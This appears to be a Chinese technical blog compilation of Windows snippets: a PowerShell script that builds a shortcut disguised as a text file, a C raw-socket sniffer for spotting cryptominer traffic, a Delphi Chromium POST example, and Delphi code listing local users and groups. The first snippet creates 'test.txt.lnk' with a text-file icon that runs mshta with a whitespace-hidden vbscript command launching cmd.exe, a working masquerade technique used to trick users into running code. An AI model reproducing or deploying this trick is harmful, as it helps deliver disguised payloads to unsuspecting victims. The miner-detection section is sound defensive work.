
lnk的一个玩法。

$Shell = New-Object -ComObject WScript.Shell
$Dir = Split-Path -Parent $MyInvocation.MyCommand.Definition
$Shortcut = $Shell.CreateShortcut("$Dir\test.txt.lnk")
$Shortcut.TargetPath = "%Windir%\System32\mshta.exe"
$Shortcut.IconLocation = "shell32.dll,70"
$Shortcut.Arguments ='                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               vbscript:CreateObject("WScript.Shell").Run("cmd.exe",5)(window.close)'

$Shortcut.Save()



保存为.ps1然后用PowerShell运行

生成一个test.lnk 图标样式为txt

利用SIO_RCVALL捕获数据来简单查找挖矿木马

只做简单的技术研究,不保证百分百好用。

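/*
 * Capture one raw IPv4 frame with SIO_RCVALL and locate its TCP payload.
 *
 * The surrounding scope (not shown) must declare `wsa` (WSADATA), `hSniffer`
 * (SOCKET), `LocalAddr` (sockaddr_in) and the IPV4_HDR / TCP_HDR structures
 * whose `ip_protocol`, `ip_header_len` and `data_offset` fields are read below.
 * On exit `lpszStr` points at the TCP payload and `nPayloadLen` holds its
 * length in bytes; both stay NULL/0 when the frame is not a complete TCP
 * segment. The payload is raw bytes, NOT a NUL-terminated string.
 * Every Winsock call is checked; on failure control jumps to `cleanup`.
 * NOTE(review): a raw socket plus SIO_RCVALL needs an elevated process —
 * confirm the caller runs with administrator rights.
 */
DWORD sioarg;            /* RCVALL_ON */
DWORD dwValue;           /* bytes-returned slot WSAIoctl insists on; unused */
char *Buffer;
IPV4_HDR *IPHeader;
TCP_HDR *TCPHeader;
char *lpszStr;
int nRecv;
int nPayloadLen;
int ipHdrLen;
int tcpHdrLen;

hSniffer = INVALID_SOCKET;
Buffer = NULL;
lpszStr = NULL;
nPayloadLen = 0;

if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
    goto cleanup;
}
hSniffer = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
if (hSniffer == INVALID_SOCKET) {
    goto cleanup;
}

/* Bind the raw socket before enabling SIO_RCVALL.
 * NOTE(review): INADDR_NONE is kept from the original, but SIO_RCVALL is
 * documented as requiring a bind to a specific local interface address, so
 * verify this bind succeeds on the target host — bind() failures are now
 * reported instead of silently ignored. */
LocalAddr.sin_family = AF_INET;
LocalAddr.sin_port = 0;
LocalAddr.sin_addr.s_addr = INADDR_NONE;
if (bind(hSniffer, (struct sockaddr *)&LocalAddr, sizeof(LocalAddr)) == SOCKET_ERROR) {
    goto cleanup;
}

/* Switch the bound interface into receive-all capture mode. */
sioarg = 1;
dwValue = 0;
if (WSAIoctl(hSniffer, SIO_RCVALL, &sioarg, sizeof(DWORD), 0, 0,
             (LPDWORD)&dwValue, 0, 0) == SOCKET_ERROR) {
    goto cleanup;
}

/* 65536 bytes covers the largest possible IPv4 datagram. */
Buffer = (char *)malloc(65536);
if (Buffer == NULL) {
    goto cleanup;
}

nRecv = recvfrom(hSniffer, Buffer, 65536, 0, 0, 0);
/* 20 bytes is the minimum IPv4 header: never read the header before the
 * received length has been checked (a short or failed read returns < 20). */
if (nRecv >= 20) {
    IPHeader = (IPV4_HDR *)Buffer;
    ipHdrLen = IPHeader->ip_header_len * 4;           /* IHL is in 32-bit words */
    /* protocol 6 == TCP; also require the minimal 20-byte TCP header */
    if (IPHeader->ip_protocol == 6 && ipHdrLen >= 20 && nRecv >= ipHdrLen + 20) {
        TCPHeader = (TCP_HDR *)(Buffer + ipHdrLen);
        tcpHdrLen = TCPHeader->data_offset * 4;       /* data offset in 32-bit words */
        if (tcpHdrLen >= 20 && nRecv >= ipHdrLen + tcpHdrLen) {
            /* cast to char* first: arithmetic on TCP_HDR* would scale by sizeof(TCP_HDR) */
            lpszStr = (char *)TCPHeader + tcpHdrLen;
            nPayloadLen = nRecv - (ipHdrLen + tcpHdrLen);
        }
    }
}

/* lpszStr / nPayloadLen describe the TCP payload. Keyword matching against it
 * belongs here, before cleanup frees Buffer, and must stay within nPayloadLen
 * bytes (bounded comparison, not strstr — the payload is not NUL-terminated). */

cleanup:
free(Buffer);                        /* free(NULL) is a no-op */
if (hSniffer != INVALID_SOCKET) {
    closesocket(hSniffer);
}
WSACleanup();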

然后挖矿程序的数据包一般为以下格式(注:不保证完全):

{"jsonrpc":"2.0","method":"job","params":{"blob":"01009580fdd4055331f01c7f3a7c15f1d88ae82f82a862e88f854856bc05758100696a96c7475300000000522ab3a142b4935c04121364c53b36266999330985c21c61f234ffd0cdcbbe1e01","job_id":"771459633298218","target":"d8a30200"}}


{"id":3396,"jsonrpc":"2.0","method":"submit","params":{"id":"399161462602205","job_id":"794963340135291","nonce":"74a999d9","result":"13e887bf1e58ad20337f8da518d7abebcc449d754db036bbcfbe4ac9ca0a0000"}}


{"method": "submit", "params": {"id": "341404656460508", "job_id": "771459633298218", "nonce": "ef430500", "result": "4290fef7f43c544c2baebeaa6ce1a459f29cb03afef69517f33acf64237d0200"}, "id":4}


{"id":4,"jsonrpc":"2.0","error":null,"result":{"status":"OK"}}


通过提取关键字来与捕获的TCP数据包内容进行匹配,当数据包中存在以上固定特征后,可通过IPV4头以及TCP协议头中的IP地址字段及端口字段在GetExtendedTcpTable获取到的TCP链接状态链表中查找,pTcpTable->table[?].dwOwningPid 即为相关进程的PID。



另外如果是挖矿程序作者原版的程序一般都会有命令行参数或者在EXE同目录存在config.json文件,我们也可以通过获取进程命令行参数来加以判断。

Chromium Post

// Build a form-encoded POST to http://example.com/ and hand it to the main
// frame of Chromium1. CreateField is a project helper (not shown); the three
// fragments it wraps presumably end up as one urlencoded body,
// Data.id=27&Data.title=title&Data.body=body — confirm against CreateField.
// NOTE(review): the URL is plain http://, so the posted fields travel in clear.
var
  Headers : ICefStringMultimap;
  Body    : ICefPostData;
  Req     : ICefRequest;
begin
  // request line first: URL, verb, no special load flags
  Req := TCefRequestRef.New;
  Req.Url    := 'http://example.com/';
  Req.Method := 'POST';
  Req.Flags  := WUR_FLAG_NONE;

  // body: each element is one fragment of the urlencoded payload
  Body := TCefPostDataRef.New;
  Body.AddElement(CreateField('Data.id=27'));
  Body.AddElement(CreateField('&Data.title=title'));
  Body.AddElement(CreateField('&Data.body=body'));

  // headers: the content type must match the body encoding above
  Headers := TCefStringMultimapOwn.Create;
  Headers.Append('Content-Type', 'application/x-www-form-urlencoded');

  Req.SetHeaderMap(Headers);
  Req.PostData := Body;
  Chromium1.Browser.MainFrame.LoadRequest(Req);
end;


Delphi 获取Windows本地用户组和用户列表

头文件不全请加载    JEDI Windows Security Code Library 


{$POINTERMATH ON}
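// Enumerate the local groups of this computer with NetLocalGroupEnum (level 1)
// and print one "<comment> <name>" line per group, followed by a ".Done!" line.
// Returns the number of groups printed. NetLocalGroupEnum / LOCALGROUP_INFO_1
// come from the JEDI Lm* units; indexing Buffer[nCount] relies on the
// POINTERMATH directive declared above this function.
Function GetUserGroup():Integer;
Var
  szComputer:Array [0..MAXCHAR] Of WideChar;
  Buffer    :LPLOCALGROUP_INFO_1;
  nTotal    :DWORD;
  nEntries  :DWORD;
  hResume   :DWORD_PTR;   // passed as @hResume, so the variable holds the handle value itself
  nCount    :Integer;     // signed so that "0 to nEntries-1" is safe when nEntries = 0
  nStatus   :DWORD;
  dwPrefMax :DWORD;
  nSize     :DWORD;
  sComment  :String;
  sLine     :String;
  iLen      :Integer;
  iFull     :Integer;
begin
  Result := 0;

  // GetComputerNameW takes the buffer size in characters, not bytes.
  ZeroMemory(@szComputer, SizeOf(szComputer));
  nSize := Length(szComputer);
  if not GetComputerNameW(@szComputer, nSize) then
  begin
    Writeln('.Done!, Total: ', Result);
    Exit;
  end;

  nEntries  := 0;
  nTotal    := 0;
  Buffer    := Nil;
  dwPrefMax := MAX_PREFERRED_LENGTH;   // let the API size the buffer for all entries
  hResume   := 0;

  Writeln('User Group:', szComputer);
  nStatus := NetLocalGroupEnum(szComputer, 0, PByte(Buffer), dwPrefMax, @nEntries, @nTotal, @hResume);
  if (nStatus = S_OK) Or (nStatus = ERROR_MORE_DATA) then
  begin
    // Only nEntries entries are in Buffer; nTotal is the server-side total and
    // exceeds nEntries when ERROR_MORE_DATA is returned, so it must not bound the loop.
    for nCount := 0 to Integer(nEntries) - 1 do
    begin
      Inc(Result);
      // a Nil comment is just an empty comment, not the end of the list
      if Buffer[nCount].lgrpi1_comment <> Nil then
        sComment := Buffer[nCount].lgrpi1_comment
      else
        sComment := '';

      // Layout: 10 leading spaces, the comment, then padding so the name column
      // starts at a fixed offset (comments longer than 32 chars still get 8 spaces).
      // Building a String instead of a fixed WideChar array cannot overflow on
      // long comments.
      iLen  := Length(sComment);
      iFull := 40 - Min(iLen, 32);
      sLine := StringOfChar(' ', 10) + sComment + StringOfChar(' ', iFull);
      if Buffer[nCount].lgrpi1_name <> Nil then
        sLine := sLine + Buffer[nCount].lgrpi1_name;
      Writeln(sLine);
    end;
  end;

  if Buffer <> Nil then
    NetApiBufferFree(Buffer);

  Writeln('.Done!, Total: ', Result);
end;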


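// Enumerate the normal user accounts of this computer with NetUserEnum
// (level 3, FILTER_NORMAL_ACCOUNT) and print name, remarks, privilege level
// and login script (when set) for each, followed by a ".Done!" line.
// Returns the number of accounts printed. NetUserEnum / USER_INFO_3 come from
// the JEDI Lm* units. NOTE(review): level-3 data is only returned to callers
// with sufficient rights — confirm the process is suitably privileged, otherwise
// the call fails and nothing is listed.
Function GetUsers():Integer;
Var
  szComputer:Array [0..MAXCHAR] Of WideChar;
  Buffer    :PUserInfo3;
  nTotal    :DWORD;
  nEntries  :DWORD;
  hResume   :DWORD_PTR;   // passed as @hResume, so the variable holds the handle value itself
  nCount    :Integer;     // signed so that "0 to nEntries-1" is safe when nEntries = 0
  dwPrefMax :DWORD;
  nStatus   :DWORD;
  nSize     :DWORD;
  sPriv     :String;
begin
  Result := 0;

  // GetComputerNameW takes the buffer size in characters, not bytes.
  ZeroMemory(@szComputer, SizeOf(szComputer));
  nSize := Length(szComputer);
  if not GetComputerNameW(@szComputer, nSize) then
  begin
    Writeln('.Done!, Total: ', Result);
    Exit;
  end;

  nEntries  := 0;
  nTotal    := 0;
  Buffer    := Nil;
  dwPrefMax := MAX_PREFERRED_LENGTH;   // let the API size the buffer for all entries
  hResume   := 0;

  Writeln('User Group:', szComputer);
  nStatus := NetUserEnum(szComputer, 3, FILTER_NORMAL_ACCOUNT, PByte(Buffer), dwPrefMax, @nEntries, @nTotal, @hResume);
  if (nStatus = S_OK) Or (nStatus = ERROR_MORE_DATA) then
  begin
    // Only nEntries entries are in Buffer; nTotal is the server-side total and
    // exceeds nEntries when ERROR_MORE_DATA is returned, so it must not bound the loop.
    for nCount := 0 to Integer(nEntries) - 1 do
    begin
      // an entry without a name has nothing worth printing; it is not counted
      if Buffer[nCount].usri3_name = Nil then
        Continue;
      Inc(Result);

      // Strings are built with String concatenation rather than a fixed
      // WideChar array so long comments/paths cannot overflow.
      Writeln(StringOfChar(' ', 10) + Buffer[nCount].usri3_name);

      // usri3_comment may be Nil; treat that as an empty remark
      if Buffer[nCount].usri3_comment <> Nil then
        Writeln(StringOfChar(' ', 15) + 'Remarks:' + Buffer[nCount].usri3_comment)
      else
        Writeln(StringOfChar(' ', 15) + 'Remarks:');

      case Buffer[nCount].usri3_priv of
        0: sPriv := 'Guest';   // USER_PRIV_GUEST
        1: sPriv := 'User';    // USER_PRIV_USER
        2: sPriv := 'Admin';   // USER_PRIV_ADMIN
      else
        sPriv := 'UnKnown';
      end;
      Writeln(StringOfChar(' ', 15) + 'Privilege:' + sPriv);

      if (Buffer[nCount].usri3_script_path <> Nil) And (lstrlenW(Buffer[nCount].usri3_script_path) > 0) then
        Writeln(StringOfChar(' ', 15) + 'Login Script:' + Buffer[nCount].usri3_script_path);
      Writeln('');
    end;
  end;

  if Buffer <> Nil then
    NetApiBufferFree(Buffer);

  Writeln('.Done!, Total: ', Result);
end;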